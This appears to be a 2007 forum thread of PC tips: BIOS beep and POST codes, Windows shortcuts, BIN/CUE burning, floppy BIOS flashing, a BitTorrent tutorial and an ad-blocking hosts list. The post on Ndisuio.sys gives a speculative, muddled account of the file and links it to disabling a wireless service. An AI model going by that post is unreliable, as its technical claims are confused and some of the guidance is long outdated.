700 - 799 Math Coprocessor
900 - 999 Parallel Printer Port
1000 - 1099 Alternate Printer Adapter
1100 - 1299 Asynchronous Communication Device, Adapter, or Port
1300 - 1399 Game Port
1400 - 1499 Colour/Graphics Printer
1500 - 1599 Synchronous Communication Device, Adapter, or Port
1700 - 1799 Hard Drive and/or Adapter
1800 - 1899 Expansion Unit (XT)
2000 - 2199 Bisynchronous Communication Adapter
2400 - 2599 EGA system-board Video (MCA)
3000 - 3199 LAN Adapter
4800 - 4999 Internal Modem
7000 - 7099 Phoenix BIOS Chips
7300 - 7399 3.5" Disk Drive
8900 - 8999 MIDI Adapter
11200 - 11299 SCSI Adapter
21000 - 21099 SCSI Fixed Disk and Controller
21500 - 21599 SCSI CD-ROM System

AMI BIOS Beep Codes
Code Description

1 Short Beep System OK
2 Short Beeps Parity error in the first 64 KB of memory
3 Short Beeps Memory failure in the first 64 KB
4 Short Beeps Memory failure in the first 64 KB Operational of memory
or Timer 1 on the motherboard is not functioning
5 Short Beeps The CPU on the motherboard generated an error
6 Short Beeps The keyboard controller may be bad. The BIOS cannot switch to protected mode
7 Short Beeps The CPU generated an exception interrupt
8 Short Beeps The system video adapter is either missing, or its memory is faulty
9 Short Beeps The ROM checksum value does not match the value encoded in the BIOS
10 Short Beeps The shutdown register for CMOS RAM failed
11 Short Beeps The external cache is faulty
1 Long, 3 Short Beeps Memory Problems
1 Long, 8 Short Beeps Video Card Problems

Phoenix BIOS Beep Codes
Note - Phoenix BIOS emits three sets of beeps, separated by a brief pause.

Code Description
1-1-3 CMOS read/write failure
1-1-4 ROM BIOS checksum error
1-2-1 Programmable interval timer failure
1-2-2 DMA initialisation failure
1-2-3 DMA page register read/write failure
1-3-1 RAM refresh verification failure
1-3-3 First 64k RAM chip or data line failure
1-3-4 First 64k RAM odd/even logic failure
1-4-1 Address line failure first 64k RAM
1-4-2 Parity failure first 64k RAM
2-_-_ Faulty Memory
3-1-_ Faulty Motherboard
3-2-4 Keyboard controller Test failure
3-3-4 Screen initialisation failure
3-4-1 Screen retrace test failure
3-4-2 Search for video ROM in progress
4-2-1 Timer tick interrupt in progress or failure
4-2-2 Shutdown test in progress or failure
4-2-3 Gate A20 failure
4-2-4 Unexpected interrupt in protected mode
4-3-1 RAM test in progress or failure>ffffh
4-3-2 Faulty Motherboard
4-3-3 Interval timer channel 2 test or failure
4-3-4 Time of Day clock test failure
4-4-1 Serial port test or failure
4-4-2 Parallel port test or failure
4-4-3 Math coprocessor test or failure
Low 1-1-2 System Board select failure
Low 1-1-3 Extended CMOS RAM failure

Master
29-04-07, 00:10
Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box



acessability shortcuts

Right SHIFT for eight seconds........ Switch FilterKeys on and off.

Left ALT +left SHIFT +PRINT SCREEN....... Switch High Contrast on and off.

Left ALT +left SHIFT +NUM LOCK....... Switch MouseKeys on and off.

SHIFT....... five times Switch StickyKeys on and off.

NUM LOCK...... for five seconds Switch ToggleKeys on and off.

explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK+ASTERISK....... on numeric keypad (*) Display all subfolders under the selected folder.

NUM LOCK+PLUS SIGN....... on numeric keypad (+) Display the contents of the selected folder.

NUM LOCK+MINUS SIGN....... on numeric keypad (-) Collapse the selected folder.

LEFT ARROW...... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.




Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


internetbrowser

type in u're adress "google", then press [Right CTRL] and [Enter]
add Only the registered members can see the link and .com to word and go to it


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
SHIFT when you insert a CD into the CD-ROM drive Prevent the CD from automatically playing.

Use these keyboard shortcuts for dialog boxes:

To Press
Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

Master
29-04-07, 00:11
Big Brother and Ndisuio.sys
A new Internet phenomenon?


Ndisuio.sys, a very mysterious system file is present in Windows XP and is a driver for wireless things such as wi-fi and bluetooth. However, there have been many issues with this file downloading immense amounts of data and perhaps causing activity that is "big brother"ish.

The fact that hardly any information on this file downloading data is available by Microsoft makes things quite suspicious about it. It has even been noted that it looked as if it was transferring data to major companies like Comcast, Road Runner, Time Warner, BTC and Verizon.

The good news is, it turns out this file duplicates data that is sent/received, so wherever you go, it will also transfer the data to that file but it does not leave the computer/network so it's not spyware. So it's not as much of a big brother situation then it looks like. It simply performs internal communication tasks and stands for NDIS user I/O, hence, NDISUIO. NDISUIO is also used as a driver by many developers as it makes certain wireless network tasks easier such as implementing it for 802.11x connections. Some firewalls also use it as it can get the data in order to filter it.

But duplicating this data can hog resources for no reason, so disabling it is the best thing to do. The data rate of this file's received data is huge, so that indicates that the data transfer is not over the Internet, but locally. So it's just a duplicate of network activity but because it's local everything transfers faster but uses more resources then casual internet usage as there's more data involved at a given time span of 1 second, for example.

To disable this file, go to the control panel, administration tools, services, Wireless Zero Configuration, double click and disable it. This file is probably required to run if you use any linksys wireless devices.

Master
29-04-07, 00:12
BIN & .CUE simple tutorial.

There always seems to be the question "what do I do with a .bin and .cue file" in these forums so I figured I would write a quick and simple tutorial. Please feel free to add more.

So you have downloaded two files, one with a .bin extension and one with a .cue extension. "What do I do with these?" you ask. There are a number of options.

BURN TO CD

You will need either NERO, CDRWIN or FIREBURNER to burn the file.

To burn with NERO:
Start NERO, choose FILE, choose BURN IMAGE, locate the .cue file you have and double click it. A dialog box will come up, for anything other than music make sure you choose DISC-AT-ONCE (DAO). You can also turn off the simulation burn if you so choose.
Then burn away.

To burn with CDRWin:
Start CDRWin, choose the button on the top left, choose LOAD CUESHEET, press START RECORDING.

To burn with Fireburner:
Start Fireburner, click on the button on the bottom left corner "VISUAL CUE BURNER/BINCHUNKER", press the right mouse button and choose LOAD TRACKS FROM .CUE and choose the correct .CUE file, press the right mouse button again and chooseselect "Burn/Test Burn", choose DISK AT ONCE (DAO), disable TEST BURN and MULTISESSION, press OK.

.CUE ERRORS
The most common error you will get with a .cue file is when it points to an incorrect path. This is easily fixed. Find the .bin file, copy the exact title including the .bin extension. Now find the .cue file, open the .cue file using notepad. It should look similar to this:

FILE "name of file.bin" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 00 00:04:00
INDEX 01 00:06:00

Delete everything in the quotes, in this case we would
delete name of file.bin. Now place the title you copied
in between the quotes. Save the changes and close out.
Thats it, your .cue file should work now.

OTHER WAYS TO USE .BIN & .CUE FILES

VCDGear:
This program will allow you to extract MPEG streams from CD images, convert VCD files to MPEG, correct MPEG errors, and more.

Daemon Tools:
This program creates a virtual drive on your PC which will allow you to "mount" the .cue file and use whatever is in the .bin file without having to burn it to a cd.

ISOBuster:
This program will allow you to "bust" open the .bin file and extract the files within the .bin.
_________________

Master
29-04-07, 00:13
BIOS Update Procedure

All latest Motherboards today, 486/ Pentium / Pentium Pro etc.,ensure that upgrades are easily obtained by incorporating the system BIOS in a FLASH Memory component. With FLASH BIOS, there is no need to replace an EPROM component. Once downloaded, the upgrade utility fits on a floppy disc allowing the user to save, verify and update the system BIOS. A hard drive or a network drive can also be used to run the newer upgrade utilities. However, memory managers can not be installed while upgrading.

Most pre-Pentium motherboards do not have a Flash BIOS. The following instructions therefore do not apply to these boards. If your motherboard does not have a Flash BIOS (EEPROM) you will need to use an EPROM programmer to re-program the BIOS chip. See your dealer for more information about this.

Please read the following instructions in full before starting a Flash BIOS upgrade:
A. Create a Bootable Floppy (in DOS)

•With a non-formatted disk, type the following:

format a:/s

•If using a formatted disk, type:

sys a:

This procedure will ensure a clean boot when you are flashing the new BIOS.

B. Download the BIOS file

•Download the correct BIOS file by clicking on the file name of the BIOS file you wish to download.

•Save the BIOS file and the Flash Utility file in the boot disk you have created. Unzip the BIOS file and the flash utility file. If you don't have an "unzip" utility, download the WinZip for Windows 95 shareware/ evaluation copy for that one time use from _Only the registered members can see the link or _Only the registered members can see the link Most CD ROMs found in computer magazines, have a shareware version of WinZip on them.

•You should have extracted two files:

Flash BIOS utility eg: flash7265.exe (for example)

BIOS eg: 6152J900.bin (example)

Use the latest flash utility available unless otherwise specified (either on the BIOS update page or in the archive file). This information is usually provided.

C. Upgrade the System BIOS

During boot up, write down the old BIOS version because you will need to use it for the BIOS backup file name.

Place the bootable floppy disk containing the BIOS file and the Flash Utility in drive a, and reboot the system in MS-DOS, preferably Version 6.22

•At the A:> prompt, type the corresponding Flash BIOS utility and the BIOS file with its extension.

For example:

flash625 615j900.bin

•From the Flash Memory Writer menu, select "Y" to "Do you want to save BIOS?" if you want to save (back up) your current BIOS (strongly recommended), then type the name of your current BIOS and its extension after FILE NAME TO SAVE: eg: a:\613J900.bin

Alternatively select "N" if you don't want to save your current BIOS. Beware, though, that you won't be able to recover from a possible failure.

•Select "Y" to "Are you sure to program?"

•Wait until it displays "Message: Power Off or Reset the system"

Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system. If you write to BIOS but cannot complete the procedure, do not switch off, because the computer will not be able to boo, and you will not be given another chance to flash. In this case leave your system on until you resolve the problem (flashing BIOS with old file is a possible solution, provided you've made a backup before)

Make sure the new BIOS version has been loaded properly by taking note of the BIOS identifier as the system is rebooting.

For AMI BIOS
Once the BIOS has been successfully loaded, remove the floppy disk and reboot the system holding the "END" key prior to power on until you enter CMOS setup. If you do not do this the first time booting up after upgrading the BIOS, the system will hang.

BIOS Update Tips
note:
1.Make sure never to turn off or reset your computer during the flash process. This will corrupt the BIOS data. We also recommend that you make a copy of your current BIOS on the bootable floppy so you can reflash it if you need to. (This option is not available when flashing an AMI BIOS).

2. If you have problems installing your new BIOS please check the following:

Have you done a clean boot?
In other words, did you follow the above procedure for making a bootable floppy? This ensures that when booting from "A" there are no device drivers on the diskette. Failing to do a clean boot is the most common cause for getting a "Memory Insufficient" error message when attempting to flash a BIOS.

If you have not used a bootable floppy, insure a clean boot either by

a) pressing F5 during bootup

b) by removing all device drivers on the CONFIG.SYS including the HIMEM.SYS. Do this by using the EDIT command.

Have you booted up under DOS?
Booting in Windows is another common cause for getting a "Memory Insufficient" error message when attempting to flash a BIOS. Make sure to boot up to DOS with a minimum set of drivers. Important: Booting in DOS does not mean selecting "Restart computer in MS-DOS Mode" from Windows98/95 shutdown menu or going to Prompt mode in WindowsNT, but rather following the above procedure (format a: /s and rebooting from a:\).

Have you entered the full file name of the flash utility and the BIOS plus its extension?
Do not forget that often you will need to add a drive letter (a:\) before flashing the BIOS. Example: when asked for file name of new BIOS file which is on your floppy disk, in case you're working from c:\ your will need to type a:\615j900.bin, rather than 615j900.bin only.

Master
29-04-07, 00:14
Bit Torrent Tutorials

The first things you need to know about using Bit Torrent:
-- Bit Torrent is aimed at broadband users (or any connection better than dialup).
-- Sharing is highly appreciated, and sharing is what keeps bit torrent alive.
-- A bit torrent file (*.torrent) contains information about the piece structure of the download (more on this later)
-- The method of downloading is not your conventional type of download. Since downloads do not come in as one
big chunk, you are able to download from many people at once, increasing your download speeds. There may be
100 "pieces" to a file, or 20,000+ pieces, all depending on what you're downloading. Pieces are usually small (under 200kb)
-- The speeds are based upon people sharing as they download, and seeders. Seeders are people who constantly
share in order to keep torrents alive. Usually seeders are on fast connections (10mb or higher).

In this tutorial, I will be describing it all using a bit torrent client called Azureus. This client is used to decode the .torrent files into a useable format to download from other peers. From here on out, I will refer to Bit Torrent as BT.

Which BT client you use, is purely up to you. I have tried them all, and my personal favorite is Azureus for many reasons. A big problem with most BT clients out there, is that they are extremely CPU intensive, usually using 100% of your cpu power during the whole process. This is the number one reason I use Azureus. Another, is a recently released plug-in that enables you to browse all current files listed on suprnova.org (the #1 source for torrent downloads).

Before you use the plug-in, take a look at /Only the registered members can see the link and browse the files. Hold your mouse over the links, and you'll notice every file ends in .torrent. This is the BT file extension. Usually, .torrent files are very small, under 200kb. They contain a wealth of information about the file you want to download. A .torrent file can contain just 1 single file, or a a directory full of files and more directories. But regardless, every download is split up into hundreds or thousands of pieces. The pieces make it much easier to download at higher speeds. Back to suprnova.org. Look at the columns:

Added | Name | Filesize | Seeds | DLs (and a few more which aren't very useful.)

I'll break this down.
Added: Self explanitory, its the date the torrent was added.
Name: Also self explanitory.
Filesize: Duh
Seeds: This is how many people are strictly UPLOADING, or sharing. These people are the ones that keep .torrent files alive. By "alive", I mean, if there's no one sharing the .torrent file, no one can download.
DLs: This is how many people currently downloading that particular torrent. They also help keep the torrent alive as they share while they download.

It's always best to download using a torrent that has a decent amount of seeders and downloaders, this way you can be assured there's a good chance your download will finish. The more the better.

Now that you should understand how torrent files work, and how to use them, on to Azureus!
First, get JAVA! You need this to run Azureus, as java is what powers it. Get Java here: /Only the registered members can see the link
Next, get Azureus at: /Only the registered members can see the link
Next, get the Suprnovalister plugin from /Only the registered members can see the link

Install Java JRE before you do ANYTHING.

Install Azureus, and then in the installation folder, create 2 more folders. ./Plugins/suprnovalister (For example, if you installed Azureus to C:\PROGRAM FILES\AZUREUS, create C:\PROGRAM FILES\AZUREUS\PLUGINS\SUPRNOVALISTER). Next, put the suprnovalister.jar file that you downloaded, in that folder.

Load up Azureus, and if you want, go through the settings and personalize it.

The tab labeled "My Torrents" is the section of Azureus you need the most often. That lists all your transfers, uploads and downloads. It shows every bit of information you could possibly want to know about torrents you download.

In the menu bar, go to View > Plugins > Suprnova Lister. This will open up a new tab in Azureus. Click on "Update Mirror". This will get a mirror site of suprnova.org containing all current torrent files available. Once a mirror is grabbed, choose a category from the drop-down box to the left and click "Update". Wah-lah, all the available downloads appear in the main chart above. Just double click a download you want, and bang its starting to download. Open the "My Torrents" tab again to view and make sure your download started.

After your download has finished, be nice, and leave the torrent transferring. So people can get pieces of the file from you, just as you got pieces from other people.

Alternatively, if you don't want to use the plugin... you can just head to suprnova.org and download files to any folder. Then go to File > Open > .torrent File in Azureus.

This should about wrap it up for the Bit Torrent Tutorial. If you guys think of anything I should add, or whatnot, just let me know and I'll check into it.

Master
29-04-07, 00:16
Block Adservers

f you wanna remove those nasty ads from the pages which waste lot of time and bandwidth then here is something for you I belive it will help you a lot


how it works
It's possible to set up a name server as authoritative for any domain you choose, allowing you to specify the DNS records for that domain. You can also configure most computers to be sort of mini-nameservers for themselves, so that they check their own DNS records before asking a nameserver. Either way, you get to say what hostname points to what IP address. If you haven't guessed already, the way you block ads it to provide bogus information about the domains we don't want to see - ie, all those servers out there that dedicate their existence to spewing out banner ads.

The hosts file

Probably the most common way people block ads like this is with something called the "hosts file". The hosts file is a simple list of hostnames and their corresponding IP addresses, which your computer looks at every time you try and contact a previously unknown hostname. If it finds an entry for the computer you're trying to reach, it sets the IP address for that computer to be whatever's in the hosts file.

127.0.0.1 is a special IP address which, to a computer, always means that computer. Any time a machine sends a network request to 127.0.0.1, it is talking to itself. This is very useful when it comes to blocking ads, because all we have to do is specify the IP address of any ad server to be 127.0.0.1. And to do that, all we have to do is edit the hosts file. What will happen then is something like this:

1. you visit a web page
2. the web page contains a banner ad stored on the server "ads.example.com"
3. your computer says "ads.example.com? never heard of it. wait a second, let's see if I've got the number on me..."
4. your computer finds its hosts file and checks to see if ads.example.com is listed
5. it finds the hostname, which points to 127.0.0.1
6. "great", says the computer, and sends off a request to 127.0.0.1 for the banner ad that's supposed to be on the page
7. "oh", says the computer, and fails to show anything because it just sent a request to itself for a banner ad

Where's my hosts file?

* Windows 95 / 98 / ME: C:\Windows (I think)
* Windows NT: C:\WinNT\hosts
* Windows 2000: C:\WinNT\system32\drivers\etc\
* Windows XP: C:\Windows\System32\drivers\etc
* FreeBSD / Linux / Mac OS X / Unixish operating systems: /etc/hosts
* Classic Mac OS: please read this helpful information submitted by David "iNerd" B
* Mac OS 9: Marcia Skidmore sent in details that hopefully explain what you need to know

The format of the hosts file is very simple - IP address, whitespace, then a list of hostnames (except for older Macs; please see above). However, you don't need to know anything about the format if you don't want to as you can just view the list hosts file.

Of course, that's not the only way to use the list, but it's probably the most simple for most people.


here is the hosts list which are serving you the ads just append it to your hosts file and enjoy ad free surfing makes things faster. if you want ad from certain site then just remove it from the list below.

QUOTE
127.0.0.1 007arcadegames.com
127.0.0.1 101order.com
127.0.0.1 123banners.com
127.0.0.1 123found.com
127.0.0.1 180searchassistant.com
127.0.0.1 180solutions.com
127.0.0.1 247media.com
127.0.0.1 247realmedia.com
127.0.0.1 24pm-affiliation.com
127.0.0.1 2log.com
127.0.0.1 2o7.net
127.0.0.1 4affiliate.net
127.0.0.1 4d5.net
127.0.0.1 7adpower.com
127.0.0.1 911promotion.com
127.0.0.1 a-counter.kiev.ua
127.0.0.1 a.consumer.net
127.0.0.1 a.gismeteo.ru
127.0.0.1 a.mktw.net
127.0.0.1 a.r.tv.com
127.0.0.1 a.xanga.com
127.0.0.1 a32.g.a.yimg.com
127.0.0.1 aaddzz.com
127.0.0.1 abcnews.footprint.net
127.0.0.1 abetterinternet.com
127.0.0.1 abz.com
127.0.0.1 ac.rnm.ca
127.0.0.1 accelerator-media.com
127.0.0.1 accipiter.speedera.net
127.0.0.1 action.ientry.net
127.0.0.1 actionsplash.com
127.0.0.1 actualdeals.com
127.0.0.1 ad-annex.com
127.0.0.1 ad-flow.com
127.0.0.1 ad-images.suntimes.com
127.0.0.1 ad-logics.com
127.0.0.1 ad-rotator.com
127.0.0.1 ad-server.gulasidorna.se
127.0.0.1 ad-souk.com
127.0.0.1 ad-space.net
127.0.0.1 ad-tech.com
127.0.0.1 ad-universe.com
127.0.0.1 ad-up.com
127.0.0.1 ad.100.tbn.ru
127.0.0.1 ad.37.com
127.0.0.1 ad.4web.cz
127.0.0.1 ad.71i.de
127.0.0.1 ad.a8.net
127.0.0.1 ad.abcnews.com
127.0.0.1 ad.abctv.com
127.0.0.1 ad.about.com
127.0.0.1 ad.aboutit.de
127.0.0.1 ad.aboutwebservices.com
127.0.0.1 ad.aftonbladet.se
127.0.0.1 ad.allstar.cz
127.0.0.1 ad.altervista.org
127.0.0.1 ad.asap-asp.net
127.0.0.1 ad.bondage.com
127.0.0.1 ad.centrum.cz
127.0.0.1 ad.cgi.cz
127.0.0.1 ad.chip.de
127.0.0.1 ad.clix.pt
127.0.0.1 ad.digitallook.com
127.0.0.1 ad.directconnect.se
127.0.0.1 ad.disney.go.com
127.0.0.1 ad.domainfactory.de
127.0.0.1 ad.dvdforum.nu
127.0.0.1 ad.e-kolay.net
127.0.0.1 ad.e-not.net
127.0.0.1 ad.eurosport.com
127.0.0.1 ad.ezpeer.com
127.0.0.1 ad.fido.net
127.0.0.1 ad.fragzone.se
127.0.0.1 ad.free6.com
127.0.0.1 ad.grafika.cz
127.0.0.1 ad.harmony-central.com
127.0.0.1 ad.hbv.de
127.0.0.1 ad.howstuffworks.com
127.0.0.1 ad.hyena.cz
127.0.0.1 ad.iinfo.cz
127.0.0.1 ad.ilse.nl
127.0.0.1 ad.img.yahoo.co.kr
127.0.0.1 ad.infoseek.com
127.0.0.1 ad.investopedia.com
127.0.0.1 ad.ir.ru
127.0.0.1 ad.itmedia.co.jp
127.0.0.1 ad.jetsoftware.com
127.0.0.1 ad.keenspace.com
127.0.0.1 ad.krutilka.ru
127.0.0.1 ad.leadcrunch.com
127.0.0.1 ad.linx.cz
127.0.0.1 ad.liveinternet.ru
127.0.0.1 ad.lupa.cz
127.0.0.1 ad.mediastorm.hu
127.0.0.1 ad.mgd.de
127.0.0.1 ad.moscowtimes.ru
127.0.0.1 ad.musicmatch.com
127.0.0.1 ad.mwizard.net
127.0.0.1 ad.nachtagenten.de
127.0.0.1 ad.nozonedata.com
127.0.0.1 ad.nrk.no
127.0.0.1 ad.pbs.bb.ru
127.0.0.1 ad.playground.ru
127.0.0.1 ad.preferances.com
127.0.0.1 ad.rambler.ru
127.0.0.1 ad.reunion.com
127.0.0.1 ad.seznam.cz
127.0.0.1 ad.simgames.net
127.0.0.1 ad.spieletips.de
127.0.0.1 ad.suprnova.org
127.0.0.1 ad.surfsecret.com
127.0.0.1 ad.sweclockers.com
127.0.0.1 ad.t2t2.com
127.0.0.1 ad.tbn.ru
127.0.0.1 ad.tiscali.com
127.0.0.1 ad.tisnet.net.tw
127.0.0.1 ad.tomshardware.com
127.0.0.1 ad.top50.to
127.0.0.1 ad.tv2.no
127.0.0.1 ad.tweakpc.de
127.0.0.1 ad.uk.tangozebra.com
127.0.0.1 ad.uol.com.br
127.0.0.1 ad.usatoday.com
127.0.0.1 ad.way.cz
127.0.0.1 ad.wz.cz
127.0.0.1 ad.yadro.ru
127.0.0.1 ad.yieldmanager.com
127.0.0.1 ad.yourmedia.com
127.0.0.1 ad01.mediacorpsingapore.com
127.0.0.1 ad1.emediate.dk
127.0.0.1 ad1.gamezone.com
127.0.0.1 ad1.hardware.no
127.0.0.1 ad1.kde.cz
127.0.0.1 ad1.lbe.ru
127.0.0.1 ad1.outpost.com
127.0.0.1 ad1.zendmedia.com
127.0.0.1 ad2.atlas.cz
127.0.0.1 ad2.bb.ru
127.0.0.1 ad2.insitemedia.hu
127.0.0.1 ad2.lbe.ru
127.0.0.1 ad2.linx.cz
127.0.0.1 ad2.linxcz.cz
127.0.0.1 ad2.lupa.cz
127.0.0.1 ad2.mamma.com
127.0.0.1 ad2.seznam.cz
127.0.0.1 ad2.tisnet.net.tw
127.0.0.1 ad3.tisnet.net.tw
127.0.0.1 ad4.atlas.cz
127.0.0.1 ad4.tisnet.net.tw
127.0.0.1 ad41.atlas.cz
127.0.0.1 ad4ex.com
127.0.0.1 adbanner.ro
127.0.0.1 adboost.de.vu
127.0.0.1 adbot.com
127.0.0.1 adbot.theonion.com
127.0.0.1 adbrite.com
127.0.0.1 adbureau.net
127.0.0.1 adbutler.com
127.0.0.1 adbutler.de
127.0.0.1 adcell.de
127.0.0.1 adcenter.mdf.se
127.0.0.1 adcenter.net
127.0.0.1 adcentriconline.com
127.0.0.1 adcept.net
127.0.0.1 adclick.com
127.0.0.1 adclick.gamespy.com
127.0.0.1 adclick.mint.se
127.0.0.1 adclick.ro
127.0.0.1 adclient.rottentomatoes.com
127.0.0.1 adclient1.tucows.com
127.0.0.1 adcomplete.com
127.0.0.1 adcontent.gamespy.com
127.0.0.1 adcontroller.unicast.com
127.0.0.1 adcreative.tribuneinteractive.com
127.0.0.1 adcycle.com
127.0.0.1 adcycle.icpeurope.net
127.0.0.1 addcontrol.net
127.0.0.1 addesktop.com
127.0.0.1 addfreestats.com
127.0.0.1 addme.com
127.0.0.1 addynamix.com
127.0.0.1 adengage.com
127.0.0.1 adext.inkclub.com
127.0.0.1 adfarm.mediaplex.com
127.0.0.1 adfiles.api.no
127.0.0.1 adflight.com
127.0.0.1 adfly.com
127.0.0.1 adhostcenter.com
127.0.0.1 adi.mainichi.co.jp
127.0.0.1 adimage.asiaone.com.sg
127.0.0.1 adimages.been.com
127.0.0.1 adimages.carsoup.com
127.0.0.1 adimages.go.com
127.0.0.1 adimages.homestore.com
127.0.0.1 adimages.sanomawsoy.fi
127.0.0.1 adimg.cnet.com
127.0.0.1 adimg.com.com
127.0.0.1 adimg1.chosun.com
127.0.0.1 adimgs.sapo.pt
127.0.0.1 adincl.gopher.com
127.0.0.1 adition.de
127.0.0.1 adition.net
127.0.0.1 adjuggler.yourdictionary.com
127.0.0.1 adlegend.com
127.0.0.1 adlink.de
127.0.0.1 adlog.com.com
127.0.0.1 adlogix.net
127.0.0.1 adm.ad.asap-asp.net
127.0.0.1 adman.freeze.com
127.0.0.1 admanagement.ch
127.0.0.1 admanager.beweb.com
127.0.0.1 admanager.btopenworld.com
127.0.0.1 admanager.carsoup.com
127.0.0.1 admanager.persianblog.com
127.0.0.1 admaximize.com
127.0.0.1 admedia.ro
127.0.0.1 admeta.com
127.0.0.1 admex.com
127.0.0.1 adminder.com
127.0.0.1 adminshop.com
127.0.0.1 admonitor.com
127.0.0.1 admonitor.net
127.0.0.1 admotion.com.ar
127.0.0.1 adnet.biz
127.0.0.1 adnews.maddog2000.de
127.0.0.1 ado.internet.cz
127.0.0.1 adorigin.com
127.0.0.1 adpepper.dk
127.0.0.1 adpick.switchboard.com
127.0.0.1 adprofile.net
127.0.0.1 adprojekt.pl
127.0.0.1 adpush.dreamscape.com
127.0.0.1 adq.nextag.com
127.0.0.1 adremedy.com
127.0.0.1 adremote.pathfinder.com
127.0.0.1 adrenaline.cz
127.0.0.1 adrenalinesk.sk
127.0.0.1 adreporting.com
127.0.0.1 adres.internet.com
127.0.0.1 adrevolver.com
127.0.0.1 adrevolver.holzmannverlag.de
